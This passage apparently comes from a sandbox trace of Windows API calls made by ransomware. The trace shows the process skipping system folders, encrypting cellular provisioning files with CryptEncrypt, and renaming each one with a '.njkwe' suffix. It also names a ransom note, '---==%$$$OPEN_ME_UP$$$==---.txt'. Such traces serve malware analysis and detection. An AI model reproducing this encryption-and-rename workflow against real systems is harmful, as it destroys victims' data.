lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0081.889] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.889] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0081.890] GetProcessHeap () returned 0xbe0000 [0081.890] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.890] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.890] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.890] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.890] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.890] CloseHandle (hObject=0x444) returned 1 [0081.890] GetProcessHeap () returned 0xbe0000 [0081.890] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.890] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0081.890] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\53__connections_cellular_mascom wireless (botswana)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\53__Connections_Cellular_Mascom Wireless (Botswana)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\53__connections_cellular_mascom wireless (botswana)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.891] GetProcessHeap () returned 0xbe0000 [0081.891] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.891] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x913452f1, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x913452f1, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x913452f1, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d6, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", cAlternateFileName="540__C~1.PRO")) returned 1 [0081.891] lstrcmpiW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.891] lstrcmpiW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.891] lstrcmpiW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.891] lstrcmpiW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.891] lstrcmpiW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.891] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml") returned 171 [0081.891] StrStrIW (lpFirst="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.891] lstrcmpW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.891] lstrcmpW (lpString1="540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.891] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.892] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\540__connections_cellular_orange (dominican republic)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.892] GetTickCount () returned 0x1154c86 [0081.892] GetTickCount () returned 0x1154c86 [0081.892] GetTickCount () returned 0x1154c86 [0081.892] GetTickCount () returned 0x1154c86 [0081.892] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.892] GetProcessHeap () returned 0xbe0000 [0081.892] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.892] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0081.893] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.893] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x2d6, lpOverlapped=0x0) returned 1 [0081.894] GetProcessHeap () returned 0xbe0000 [0081.894] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.894] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.894] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.894] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.894] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.894] CloseHandle (hObject=0x444) returned 1 [0081.894] GetProcessHeap () returned 0xbe0000 [0081.894] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.894] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 191 [0081.894] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\540__connections_cellular_orange (dominican republic)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\540__Connections_Cellular_Orange (Dominican Republic)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\540__connections_cellular_orange (dominican republic)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.895] GetProcessHeap () returned 0xbe0000 [0081.895] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.895] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9136b55d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9136b55d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9136b55d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35b, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", cAlternateFileName="541__C~1.PRO")) returned 1 [0081.895] lstrcmpiW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.895] lstrcmpiW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.895] lstrcmpiW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.895] lstrcmpiW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.895] lstrcmpiW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.895] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml") returned 170 [0081.895] StrStrIW (lpFirst="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.895] lstrcmpW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.895] lstrcmpW (lpString1="541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.895] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.895] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\541__connections_cellular_orange (equatorial guinea)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.896] GetTickCount () returned 0x1154c86 [0081.896] GetTickCount () returned 0x1154c86 [0081.896] GetTickCount () returned 0x1154c86 [0081.896] GetTickCount () returned 0x1154c86 [0081.896] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.896] GetProcessHeap () returned 0xbe0000 [0081.896] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.896] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x35b, lpOverlapped=0x0) returned 1 [0081.899] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffca5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.899] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x35b, lpOverlapped=0x0) returned 1 [0081.899] GetProcessHeap () returned 0xbe0000 [0081.899] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.900] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.900] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.900] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.900] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.900] CloseHandle (hObject=0x444) returned 1 [0081.900] GetProcessHeap () returned 0xbe0000 [0081.900] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.900] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0081.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\541__connections_cellular_orange (equatorial guinea)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\541__Connections_Cellular_Orange (Equatorial Guinea)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\541__connections_cellular_orange (equatorial guinea)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.901] GetProcessHeap () returned 0xbe0000 [0081.901] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.901] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9136b55d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9136b55d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9136b55d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x34f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", cAlternateFileName="542__C~1.PRO")) returned 1 [0081.901] lstrcmpiW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.901] lstrcmpiW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.901] lstrcmpiW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.901] lstrcmpiW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.901] lstrcmpiW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.901] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml") returned 170 [0081.901] StrStrIW (lpFirst="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.901] lstrcmpW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.901] lstrcmpW (lpString1="542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.901] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.901] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\542__connections_cellular_orange (equatorial guinea)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x444 [0081.901] GetTickCount () returned 0x1154c86 [0081.901] GetTickCount () returned 0x1154c86 [0081.902] GetTickCount () returned 0x1154c86 [0081.902] GetTickCount () returned 0x1154c86 [0081.902] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.902] GetProcessHeap () returned 0xbe0000 [0081.902] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc53878 [0081.902] ReadFile (in: hFile=0x444, lpBuffer=0xc53878, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesRead=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0081.903] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0xfffffcb1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.903] WriteFile (in: hFile=0x444, lpBuffer=0xc53878*, nNumberOfBytesToWrite=0x34f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc53878*, lpNumberOfBytesWritten=0x380edc4*=0x34f, lpOverlapped=0x0) returned 1 [0081.903] GetProcessHeap () returned 0xbe0000 [0081.903] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc53878 | out: hHeap=0xbe0000) returned 1 [0081.903] SetFilePointerEx (in: hFile=0x444, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.903] WriteFile (in: hFile=0x444, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.904] WriteFile (in: hFile=0x444, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.904] WriteFile (in: hFile=0x444, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.904] CloseHandle (hObject=0x444) returned 1 [0081.904] GetProcessHeap () returned 0xbe0000 [0081.904] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.904] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0081.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\542__connections_cellular_orange (equatorial guinea)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\542__Connections_Cellular_Orange (Equatorial Guinea)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\542__connections_cellular_orange (equatorial guinea)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.905] GetProcessHeap () returned 0xbe0000 [0081.905] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.905] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9136b55d, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9136b55d, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9136b55d, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ca, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", cAlternateFileName="543__C~1.PRO")) returned 1 [0081.919] lstrcmpiW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.919] lstrcmpiW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.919] lstrcmpiW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.919] lstrcmpiW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.919] lstrcmpiW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.919] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml") returned 159 [0081.919] StrStrIW (lpFirst="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.919] lstrcmpW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.919] lstrcmpW (lpString1="543__Connections_Cellular_Orange (Guinea)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.919] StrCmpNW 